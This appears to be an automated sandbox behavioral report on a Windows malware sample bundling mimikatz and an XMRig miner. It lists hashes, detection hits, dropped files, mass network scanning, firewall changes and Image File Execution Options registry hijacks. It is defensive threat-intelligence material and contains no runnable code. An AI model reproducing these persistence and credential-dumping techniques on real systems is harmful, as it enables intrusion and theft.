Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
02-09-2024 08:43
Behavioral task
behavioral1
Sample
20240902d95be7c052f8c656bef5b939fefd120fhacktoolsicedidmimikatz.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
20240902d95be7c052f8c656bef5b939fefd120fhacktoolsicedidmimikatz.exe
Resource
win10v2004-20240802-en
General
-
Target
20240902d95be7c052f8c656bef5b939fefd120fhacktoolsicedidmimikatz.exe
-
Size
8.3MB
-
MD5
d95be7c052f8c656bef5b939fefd120f
-
SHA1
33e2460b0ea2c0b02e323525485c90a176830edd
-
SHA256
00089336ae963725890d7f9371d7e9b7f5344ec8014509d2d1cf01a9ed707a42
-
SHA512
87cc9cb4ce6458d2c250b695847ef1e71c66a73e403326f22b28232109f1267fb3de2e8f60dc3990865c6427370f45eda5a2e60586db2be0f6c91f275d58dacb
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4720 created 2168 4720 phznlij.exe 38 -
Contacts a large (30641) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/852-177-0x00007FF756D30000-0x00007FF756E50000-memory.dmp xmrig behavioral2/memory/852-181-0x00007FF756D30000-0x00007FF756E50000-memory.dmp xmrig behavioral2/memory/852-199-0x00007FF756D30000-0x00007FF756E50000-memory.dmp xmrig behavioral2/memory/852-211-0x00007FF756D30000-0x00007FF756E50000-memory.dmp xmrig behavioral2/memory/852-224-0x00007FF756D30000-0x00007FF756E50000-memory.dmp xmrig behavioral2/memory/852-233-0x00007FF756D30000-0x00007FF756E50000-memory.dmp xmrig behavioral2/memory/852-246-0x00007FF756D30000-0x00007FF756E50000-memory.dmp xmrig behavioral2/memory/852-250-0x00007FF756D30000-0x00007FF756E50000-memory.dmp xmrig behavioral2/memory/852-251-0x00007FF756D30000-0x00007FF756E50000-memory.dmp xmrig behavioral2/memory/852-252-0x00007FF756D30000-0x00007FF756E50000-memory.dmp xmrig behavioral2/memory/852-255-0x00007FF756D30000-0x00007FF756E50000-memory.dmp xmrig behavioral2/memory/852-256-0x00007FF756D30000-0x00007FF756E50000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/4928-0-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/4928-4-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/files/0x00070000000234e7-6.dat mimikatz behavioral2/memory/4140-8-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/1012-138-0x00007FF632920000-0x00007FF632A0E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts phznlij.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts phznlij.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" phznlij.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe phznlij.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" phznlij.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe phznlij.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe phznlij.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" phznlij.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" phznlij.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe phznlij.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" phznlij.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe phznlij.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe phznlij.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe phznlij.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe phznlij.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" phznlij.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" phznlij.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe phznlij.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" phznlij.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" phznlij.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe phznlij.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" phznlij.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" phznlij.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" phznlij.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" phznlij.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe phznlij.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" phznlij.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe phznlij.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" phznlij.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" phznlij.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe phznlij.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" phznlij.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" phznlij.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe phznlij.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" phznlij.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe phznlij.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe phznlij.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe phznlij.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe phznlij.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe phznlij.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" phznlij.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe phznlij.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 1808 netsh.exe 4396 netsh.exe -
Executes dropped EXE 28 IoCs
pid Process 4140 phznlij.exe 4720 phznlij.exe 3104 wpcap.exe 2868 islkeazek.exe 1012 vfshost.exe 1012 xohudmc.exe 1856 hmdriy.exe 4928 gveebtguf.exe 852 gckntm.exe 2912 gveebtguf.exe 32 gveebtguf.exe 1640 gveebtguf.exe 2500 gveebtguf.exe 4204 gveebtguf.exe 2544 gveebtguf.exe 4360 gveebtguf.exe 4528 gveebtguf.exe 5084 gveebtguf.exe 4700 gveebtguf.exe 5088 gveebtguf.exe 1904 phznlij.exe 4580 gveebtguf.exe 1472 gveebtguf.exe 1536 gveebtguf.exe 2140 gveebtguf.exe 5044 gveebtguf.exe 1704 tinlykfeb.exe 872 phznlij.exe -
Loads dropped DLL 12 IoCs
pid Process 3104 wpcap.exe 3104 wpcap.exe 3104 wpcap.exe 3104 wpcap.exe 3104 wpcap.exe 3104 wpcap.exe 3104 wpcap.exe 3104 wpcap.exe 3104 wpcap.exe 2868 islkeazek.exe 2868 islkeazek.exe 2868 islkeazek.exe -
resource yara_rule behavioral2/memory/1012-136-0x00007FF632920000-0x00007FF632A0E000-memory.dmp upx behavioral2/files/0x000700000002352d-135.dat upx behavioral2/memory/1012-138-0x00007FF632920000-0x00007FF632A0E000-memory.dmp upx behavioral2/files/0x0007000000023538-155.dat upx behavioral2/memory/4928-156-0x00007FF7DA110000-0x00007FF7DA16B000-memory.dmp upx behavioral2/memory/4928-159-0x00007FF7DA110000-0x00007FF7DA16B000-memory.dmp upx behavioral2/files/0x0007000000023535-163.dat upx behavioral2/memory/852-164-0x00007FF756D30000-0x00007FF756E50000-memory.dmp upx behavioral2/memory/2912-170-0x00007FF7DA110000-0x00007FF7DA16B000-memory.dmp upx behavioral2/memory/32-174-0x00007FF7DA110000-0x00007FF7DA16B000-memory.dmp upx behavioral2/memory/852-177-0x00007FF756D30000-0x00007FF756E50000-memory.dmp upx behavioral2/memory/1640-179-0x00007FF7DA110000-0x00007FF7DA16B000-memory.dmp upx behavioral2/memory/852-181-0x00007FF756D30000-0x00007FF756E50000-memory.dmp upx behavioral2/memory/2500-184-0x00007FF7DA110000-0x00007FF7DA16B000-memory.dmp upx behavioral2/memory/4204-188-0x00007FF7DA110000-0x00007FF7DA16B000-memory.dmp upx behavioral2/memory/2544-192-0x00007FF7DA110000-0x00007FF7DA16B000-memory.dmp upx behavioral2/memory/4360-196-0x00007FF7DA110000-0x00007FF7DA16B000-memory.dmp upx behavioral2/memory/852-199-0x00007FF756D30000-0x00007FF756E50000-memory.dmp upx behavioral2/memory/4528-201-0x00007FF7DA110000-0x00007FF7DA16B000-memory.dmp upx behavioral2/memory/5084-205-0x00007FF7DA110000-0x00007FF7DA16B000-memory.dmp upx behavioral2/memory/4700-209-0x00007FF7DA110000-0x00007FF7DA16B000-memory.dmp upx behavioral2/memory/852-211-0x00007FF756D30000-0x00007FF756E50000-memory.dmp upx behavioral2/memory/5088-214-0x00007FF7DA110000-0x00007FF7DA16B000-memory.dmp upx behavioral2/memory/4580-222-0x00007FF7DA110000-0x00007FF7DA16B000-memory.dmp upx behavioral2/memory/852-224-0x00007FF756D30000-0x00007FF756E50000-memory.dmp upx behavioral2/memory/1472-227-0x00007FF7DA110000-0x00007FF7DA16B000-memory.dmp upx behavioral2/memory/1536-230-0x00007FF7DA110000-0x00007FF7DA16B000-memory.dmp upx behavioral2/memory/2140-232-0x00007FF7DA110000-0x00007FF7DA16B000-memory.dmp upx behavioral2/memory/852-233-0x00007FF756D30000-0x00007FF756E50000-memory.dmp upx behavioral2/memory/5044-235-0x00007FF7DA110000-0x00007FF7DA16B000-memory.dmp upx behavioral2/memory/852-246-0x00007FF756D30000-0x00007FF756E50000-memory.dmp upx behavioral2/memory/852-250-0x00007FF756D30000-0x00007FF756E50000-memory.dmp upx behavioral2/memory/852-251-0x00007FF756D30000-0x00007FF756E50000-memory.dmp upx behavioral2/memory/852-252-0x00007FF756D30000-0x00007FF756E50000-memory.dmp upx behavioral2/memory/852-255-0x00007FF756D30000-0x00007FF756E50000-memory.dmp upx behavioral2/memory/852-256-0x00007FF756D30000-0x00007FF756E50000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 65 ifconfig.me 66 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\hmdriy.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 phznlij.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies phznlij.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\hmdriy.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE phznlij.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache phznlij.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData phznlij.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDAB91A53CE5876D153BF0B6B3BA7DCE phznlij.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content phznlij.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 phznlij.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft phznlij.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 phznlij.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDAB91A53CE5876D153BF0B6B3BA7DCE phznlij.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\teigzljfc\Corporate\mimidrv.sys phznlij.exe File created C:\Windows\teigzljfc\UnattendGC\specials\exma-1.dll phznlij.exe File opened for modification C:\Windows\lvpuunkb\vimpcsvc.xml phznlij.exe File opened for modification C:\Windows\lvpuunkb\schoedcl.xml phznlij.exe File created C:\Windows\teigzljfc\UnattendGC\Shellcode.ini phznlij.exe File created C:\Windows\teigzljfc\UnattendGC\AppCapture32.dll phznlij.exe File created C:\Windows\teigzljfc\UnattendGC\specials\libeay32.dll phznlij.exe File created C:\Windows\teigzljfc\UnattendGC\specials\zlib1.dll phznlij.exe File created C:\Windows\teigzljfc\UnattendGC\specials\schoedcl.exe phznlij.exe File opened for modification C:\Windows\lvpuunkb\docmicfg.xml phznlij.exe File created C:\Windows\teigzljfc\pekntqkbk\wpcap.exe phznlij.exe File created C:\Windows\teigzljfc\UnattendGC\spoolsrv.xml phznlij.exe File created C:\Windows\teigzljfc\UnattendGC\specials\trfo-2.dll phznlij.exe File opened for modification C:\Windows\lvpuunkb\svschost.xml phznlij.exe File created C:\Windows\teigzljfc\UnattendGC\AppCapture64.dll phznlij.exe File created C:\Windows\teigzljfc\Corporate\vfshost.exe phznlij.exe File opened for modification C:\Windows\teigzljfc\Corporate\log.txt cmd.exe File created C:\Windows\teigzljfc\UnattendGC\specials\ucl.dll phznlij.exe File created C:\Windows\lvpuunkb\vimpcsvc.xml phznlij.exe File created C:\Windows\teigzljfc\Corporate\mimilib.dll phznlij.exe File created C:\Windows\teigzljfc\pekntqkbk\ip.txt phznlij.exe File created C:\Windows\teigzljfc\UnattendGC\specials\spoolsrv.exe phznlij.exe File created C:\Windows\teigzljfc\UnattendGC\svschost.xml phznlij.exe File created C:\Windows\teigzljfc\UnattendGC\specials\schoedcl.xml phznlij.exe File created C:\Windows\teigzljfc\UnattendGC\specials\xdvl-0.dll phznlij.exe File opened for modification C:\Windows\teigzljfc\pekntqkbk\Result.txt tinlykfeb.exe File created C:\Windows\teigzljfc\UnattendGC\specials\trch-1.dll phznlij.exe File created C:\Windows\teigzljfc\UnattendGC\specials\spoolsrv.xml phznlij.exe File created C:\Windows\teigzljfc\UnattendGC\specials\vimpcsvc.xml phznlij.exe File created C:\Windows\lvpuunkb\svschost.xml phznlij.exe File created C:\Windows\lvpuunkb\schoedcl.xml phznlij.exe File created C:\Windows\lvpuunkb\docmicfg.xml phznlij.exe File created C:\Windows\ime\phznlij.exe phznlij.exe File created C:\Windows\lvpuunkb\phznlij.exe 20240902d95be7c052f8c656bef5b939fefd120fhacktoolsicedidmimikatz.exe File opened for modification C:\Windows\teigzljfc\pekntqkbk\Packet.dll phznlij.exe File created C:\Windows\teigzljfc\UnattendGC\specials\cnli-1.dll phznlij.exe File created C:\Windows\teigzljfc\UnattendGC\specials\tucl-1.dll phznlij.exe File created C:\Windows\teigzljfc\UnattendGC\specials\svschost.exe phznlij.exe File created C:\Windows\teigzljfc\UnattendGC\specials\docmicfg.xml phznlij.exe File created C:\Windows\teigzljfc\pekntqkbk\Packet.dll phznlij.exe File created C:\Windows\teigzljfc\UnattendGC\specials\posh-0.dll phznlij.exe File created C:\Windows\teigzljfc\UnattendGC\specials\tibe-2.dll phznlij.exe File created C:\Windows\teigzljfc\pekntqkbk\tinlykfeb.exe phznlij.exe File created C:\Windows\teigzljfc\UnattendGC\specials\svschost.xml phznlij.exe File created C:\Windows\lvpuunkb\spoolsrv.xml phznlij.exe File opened for modification C:\Windows\lvpuunkb\spoolsrv.xml phznlij.exe File opened for modification C:\Windows\lvpuunkb\phznlij.exe 20240902d95be7c052f8c656bef5b939fefd120fhacktoolsicedidmimikatz.exe File created C:\Windows\teigzljfc\UnattendGC\specials\crli-0.dll phznlij.exe File created C:\Windows\teigzljfc\UnattendGC\specials\libxml2.dll phznlij.exe File created C:\Windows\teigzljfc\UnattendGC\specials\ssleay32.dll phznlij.exe File created C:\Windows\teigzljfc\UnattendGC\specials\vimpcsvc.exe phznlij.exe File created C:\Windows\teigzljfc\upbdrjv\swrpwe.exe phznlij.exe File created C:\Windows\teigzljfc\pekntqkbk\islkeazek.exe phznlij.exe File created C:\Windows\teigzljfc\UnattendGC\specials\coli-0.dll phznlij.exe File created C:\Windows\teigzljfc\UnattendGC\schoedcl.xml phznlij.exe File created C:\Windows\teigzljfc\pekntqkbk\wpcap.dll phznlij.exe File created C:\Windows\teigzljfc\UnattendGC\specials\docmicfg.exe phznlij.exe File created C:\Windows\teigzljfc\UnattendGC\vimpcsvc.xml phznlij.exe File created C:\Windows\teigzljfc\UnattendGC\docmicfg.xml phznlij.exe File created C:\Windows\teigzljfc\pekntqkbk\scan.bat phznlij.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3748 sc.exe 1704 sc.exe 692 sc.exe 2584 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 20240902d95be7c052f8c656bef5b939fefd120fhacktoolsicedidmimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language phznlij.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened 